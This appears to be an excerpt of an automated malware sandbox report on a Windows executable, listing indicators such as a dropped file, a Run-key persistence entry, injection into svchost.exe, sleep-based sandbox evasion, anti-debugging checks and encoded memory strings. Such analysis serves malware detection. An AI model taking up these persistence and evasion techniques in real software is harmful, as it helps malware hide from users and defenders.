                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: nhVJ8J5qOt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: nhVJ8J5qOt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: nhVJ8J5qOt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: nhVJ8J5qOt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: nhVJ8J5qOt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: nhVJ8J5qOt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: nhVJ8J5qOt.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
                  Source: nhVJ8J5qOt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: nhVJ8J5qOt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: nhVJ8J5qOt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: nhVJ8J5qOt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: nhVJ8J5qOt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: nhVJ8J5qOt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeUnpacked PE file: 0.2.nhVJ8J5qOt.exe.1270000.1.unpack
                  Source: C:\Users\user\pigalicapi.exeUnpacked PE file: 1.2.pigalicapi.exe.1170000.2.unpack
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_0037E1A6 push ecx; ret 0_2_0037E1B9
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C7E1A6 push ecx; ret 1_2_00C7E1B9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04009D2D push ecx; ret 4_2_04009D40
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04000E0A push ebp; ret 4_2_04000E0B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0408B08C push es; iretd 4_2_0408B09A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0408B0CB push 7240BFEDh; ret 4_2_0408B0D2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0408A9BB push E44F2B70h; ret 4_2_0408AA63
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0408AA04 push E44F2B70h; ret 4_2_0408AA63
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0408B378 push eax; ret 4_2_0408B389
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0408B3D9 pushfd ; ret 4_2_0408B3E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0408BF20 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,4_2_0408BF20

                  Persistence and Installation Behavior

                  barindex
                  Source: Yara matchFile source: 0.2.nhVJ8J5qOt.exe.1270000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.pigalicapi.exe.7b0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.pigalicapi.exe.1170000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.svchost.exe.4000000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.svchost.exe.4000000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.nhVJ8J5qOt.exe.1270000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.pigalicapi.exe.7b0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.pigalicapi.exe.1170000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.svchost.exe.4000000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.813790017.0000000001270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeFile created: C:\Users\user\pigalicapi.exeJump to dropped file
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeFile created: C:\Users\user\pigalicapi.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeFile created: C:\Users\user\pigalicapi.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\svchost.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pigalicapiJump to behavior
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pigalicapiJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\pigalicapi.exeCode function: EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,1_2_01173B00
                  Source: C:\Users\user\pigalicapi.exeCode function: EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,3_2_007B3B00
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exe TID: 5196Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exe TID: 2376Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exe TID: 2832Thread sleep time: -21600000s >= -30000sJump to behavior
                  Source: C:\Users\user\pigalicapi.exe TID: 4092Thread sleep time: -21600000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 2604Thread sleep count: 152 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 6136Thread sleep time: -95000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 788Thread sleep count: 138 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 4648Thread sleep count: 33 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 5980Thread sleep count: 41 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 5980Thread sleep count: 39 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 5980Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 5156Thread sleep count: 63 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 5980Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 6036Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 5804Thread sleep count: 1051 > 30
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 2408Thread sleep count: 1038 > 30
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 5632Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 5168Thread sleep count: 1159 > 30
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 624Thread sleep count: 1083 > 30
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 6336Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 784Thread sleep count: 259 > 30
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 756Thread sleep count: 250 > 30
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 6648Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 17008Thread sleep count: 107 > 30
                  Source: C:\Users\user\pigalicapi.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_1-12637
                  Source: C:\Users\user\pigalicapi.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_01171CA0 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,Process32First,lstrlenA,lstrcpyA,OpenProcess,EnumProcessModules,K32EnumProcessModules,GetModuleFileNameExA,GetProcessImageFileNameA,K32GetProcessImageFileNameA,FindCloseChangeNotification,Process32Next,CloseHandle,1_2_01171CA0
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-8930
                  Source: C:\Users\user\pigalicapi.exeThread delayed: delay time: 21600000Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 1051
                  Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 1038
                  Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 1159
                  Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 1083
                  Source: C:\Users\user\pigalicapi.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-12339
                  Source: C:\Users\user\pigalicapi.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_1-12618
                  Source: C:\Users\user\pigalicapi.exeCode function: GetAdaptersInfo,1_2_01179F70
                  Source: C:\Users\user\pigalicapi.exeCode function: GetAdaptersInfo,3_2_007B9F70
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_01178F80 GetVersionExA,GetSystemInfo,lstrcatA,lstrcatA,lstrcatA,GetSystemMetrics,lstrcatA,GetSystemMetrics,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,1_2_01178F80
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_00372D3C FindFirstFileA,GetModuleHandleA,0_2_00372D3C
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_00372940 FindFirstFileA,GetModuleHandleA,0_2_00372940
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_00381BA9 FindFirstFileExW,0_2_00381BA9
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C72940 FindFirstFileA,GetModuleHandleA,1_2_00C72940
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C72D3C FindFirstFileA,GetModuleHandleA,1_2_00C72D3C
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C81BA9 FindFirstFileExW,1_2_00C81BA9
                  Source: C:\Users\user\pigalicapi.exeThread delayed: delay time: 21600000Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 60000Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 60000Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeAPI call chain: ExitProcess graph end nodegraph_0-8729
                  Source: C:\Users\user\pigalicapi.exeAPI call chain: ExitProcess graph end nodegraph_1-12239
                  Source: C:\Users\user\pigalicapi.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
                  Source: pigalicapi.exe, 00000001.00000002.832637216.0000000007258000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW7
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641070447.000000000774D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.651017417.0000000007697000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.832351846.000000000768C000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.0000000007689000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.516964365.0000000007699000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.739674320.0000000007698000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.516989442.000000000769C000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.527457283.0000000007690000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx2
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.651017417.0000000007697000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.832351846.000000000768C000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.0000000007689000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.516964365.0000000007699000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.739674320.0000000007698000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.516989442.000000000769C000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.527457283.0000000007690000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641101813.0000000007740000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KpwcrIDQTJiNQunBEvah2jKDKkLThw3wJecdt9b8GYskYHP+Dcdj38IzhH8UWtLxCl+RW3Ar23q/JFsRSm8bPruFXHzMaLnvmCi5rGZPAlAKcttabEw0KcrgscnX1oFDE6QBKmFv18ef4OwDotnDqMdmtCx1fajE
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641101813.000000000770A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qu8vMci+8+mFnYRinCuLKdxGDYnNX/Igo2wQAchmUXTrlcJ8Do6jcGROUkJqUoX6/GLpdq2CT6b/r3wGf+mYryMfImkd8lvO0YW04TOLLIx5k1bRLi6T/E4u61MBUB/i6IHTaThXJBXKCHEn2PA1XKCyTT4vXmdyIRz/yFpXS/h+RwdT7V2ZrRerIbYi6Tz5eXlYc2saWc4t11o0phP32hjM/3GnWPkmdxHo1ID+zuq2F1aacwI9mHdzsOH26ce08TvWZE6a7cXYBMV6
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641101813.000000000770A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: oZuF+x45BuLObuaTQPsc25nPzopdDApiVmci1ud1Z7vW5wkH9xb7fbqLRYZsPd+GKLefHRna3yLLpo+9W|2
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_0037DF6F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0037DF6F
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_01171CA0 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,Process32First,lstrlenA,lstrcpyA,OpenProcess,EnumProcessModules,K32EnumProcessModules,GetModuleFileNameExA,GetProcessImageFileNameA,K32GetProcessImageFileNameA,FindCloseChangeNotification,Process32Next,CloseHandle,1_2_01171CA0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0408BF20 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,4_2_0408BF20
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_0037C937 GetProcessHeap,0_2_0037C937
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_0037C3CD mov eax, dword ptr fs:[00000030h]0_2_0037C3CD
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C7C3CD mov eax, dword ptr fs:[00000030h]1_2_00C7C3CD
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_01173090 mov eax, dword ptr fs:[00000030h]1_2_01173090
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_0117EF90 mov eax, dword ptr fs:[00000030h]1_2_0117EF90
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_007B3090 mov eax, dword ptr fs:[00000030h]3_2_007B3090
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_007BEF90 mov eax, dword ptr fs:[00000030h]3_2_007BEF90
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00B02000 mov eax, dword ptr fs:[00000030h]3_2_00B02000
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00401005 mov eax, dword ptr fs:[00000030h]4_2_00401005
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04001A30 mov eax, dword ptr fs:[00000030h]4_2_04001A30
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_0037E101 SetUnhandledExceptionFilter,0_2_0037E101
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_0037E1BB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0037E1BB
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_0037DF6F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0037DF6F
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_003797C0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003797C0
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C7E101 SetUnhandledExceptionFilter,1_2_00C7E101
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C7E1BB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00C7E1BB
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C797C0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00C797C0
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C7DF6F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00C7DF6F
